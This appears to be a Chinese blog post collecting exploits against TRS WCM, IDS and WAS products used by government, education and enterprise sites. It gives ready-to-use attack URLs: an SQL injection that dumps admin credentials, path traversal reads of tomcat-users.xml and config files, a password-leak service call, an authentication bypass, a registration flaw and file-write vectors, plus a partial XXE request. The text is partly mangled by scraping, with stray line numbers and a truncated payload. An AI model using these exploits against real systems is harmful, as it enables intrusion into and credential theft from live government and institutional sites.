0x00 前言
TRS北京拓尔思信息技术股份有限公司,其业务系统主要应用于政府、教育、企业等领域,漏洞较多系统有WCM(内容管理系统)、WAS(文本检索系统)、IDS(身份管理系统)。好多客户用到这个,记录一下
0x01 WCM内容管理系统
1.1 WCM5.2~WCM6.5存在SQL注入
首先是这个页面,http://xx.xx.xx/portal/db/dbupdatelog_list.jsp
直接注入
1 2 3 4 5 6 7 8 9 10 11 |
http://agent.trs.cn/portal/db/db ... &OrderType=desc;/**/update/**/WCMDBUPDATELOG/**/set/**/LogTitle=%28select/**/top/**/1/**/UserName%2bPassWord/**/from/**/WCMUSER%29/**/where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOG http://agent.trs.cn/portal/db/db ... &OrderType=desc;/**/update/**/WCMDBUPDATELOG/**/set/**/LogTitle=%28select/**/top/**/1/**/UserName%2bPassWord/**/from/**/WCMUSER%29/**/where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOG ``` 注:存在注入参数为:`OrderType`和`OrderField` ### 1.2 [WCM任意文件下载漏洞](WCM任意文件下载漏洞) 漏洞存在于`wcm/app/system/read_image.jsp`读取上传图片功能处,可构造链接下载任意文件,列如 |
http://xx.xx.xx/wcm/app/system/read_image.jsp?Filename=../../../tomcat/conf/tomcat-users.xml
1 2 3 4 5 6 7 8 9 |
读取`tomcat`配置文件 ### 1.3 [WCM6.x系列用户密码泄漏](WCM6.x系列用户密码泄漏) TRS WCM 6.0以上版本某个功能页面调用`service`限制不严格,可以获取后台管理用户的用户名和密码序列。 访问链接: |
HTTP://xx.xx.xx/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers
1 2 3 4 5 6 7 |
WCM的密码加密方式是:常规`32`位`MD5`取前`15`位; 如果只访问`wcm/infoview.do`,尽管是个错误页面,比如: 首先访问 |
http://xx.xx.xx/wcm/infoview.do
1 2 3 |
然后你再访问:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
### 1.4 [WCM用户注册逻辑漏洞](WCM用户注册逻辑漏洞) 问题出在`wcm/console/auth/reg_newuser.jsp`文件中 即将随意表单改成`STATUS`值为`30`,或增加`STATUS`字段表单。 然后提交注册 虽然说是“请等待开通!”,但实际上已经开通了,因为`STATUS`字段已经改成正常了。 直接登陆 虽然没什么权限,但后台存在大量注入等漏洞 可以通过注入直接操作数据库了。 |
1 2 3 4 5 6 7 |
### 1.5 [WCM6权限绕过](WCM6权限绕过) 首先访问wcm目录,会自动跳转到登录页面 在网址后加上查看管理员密码的链接: |
wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
```
之前的漏洞说查看管理员信息的危害不大是因为MD5加密只取半截,并且即使破解还有可能遇到admin账号未启用的问题
这时我们点击浏览器的后退按钮或在地址栏的网址后面直接输入wcm/app/login.jsp,这样就绕过权限登录了
1.6 WCM全版本任意文件写入漏洞
这个是16年年初出的漏洞,当初协助北京公司做过一次排查。
是利用webservices的importDocuments接口匿名访问,加上畸形文件名进行利用,未找到poc
0x02 IDS身份管理系统
2.1 IDS系统任意文件读取和信息泄露漏洞
漏洞文件路径在admin/debug/目录下,读取文件为fv.jsp,信息泄露为env.jsp等,直接访问文件即可
2.2 XXE漏洞
使用DNS Log进行记录
POST /ids/service?idsServiceType=jitSyncUser HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: trsidsssosessionid=2382B8AE9E8FB5B441212CE2595F963E**.**.**.**
X-Forwarded-For: **.**.**.**
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------1988224119974
Content-Length: 196
]>&xxe;
0x03 WAS文本检索系统
3.1 WAS未授权访问
安装目录下was40/tree文件可以看到一些后台功能
访问was40/passwd/passwd.htm输入一个不存在的用户名会暴露出服务器内网IP地址 同时存在暴力破解用户密码的可能性
3.2 未授权发布信息
编辑信息的时候未对提交的数据进行过滤,同时存在未对用户是否登录进行验证
0x04 WAS任意文件读取
问题出在/was5/web/tree文件下,构造路径可以任意读取文件,这个就创宇提的那个漏洞
http://xx.xx.xx/was5/web/tree?treefile=/WEB-INF/classes/com/trs/was/resource/wasconfig.properties
0x05 WAS任意文件下载漏洞
问题出在was5/admin/template/download_templet.jsp文件下,构造type参数的值可以任意下载文件,
http://xx.xx.xx/was5/admin/template/download_templet.jsp?type=../web/tagscloud
0x06 WAS任意文件写入
漏洞文件是was5/admin/template/customize/detailcustomize,构造template的参数值进行任意文件写入
同理还有一个问题文件/was5/admin/template/customize/outlinecustomize,利用方式一样
发布者:常山赵子龙,转载请注明出处:https://www.qztxs.com/archives/science/technology/11476
微信扫一扫 
支付宝扫一扫 
